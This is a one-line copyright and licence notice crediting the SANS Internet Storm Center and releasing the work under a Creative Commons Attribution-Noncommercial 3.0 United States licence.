(c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.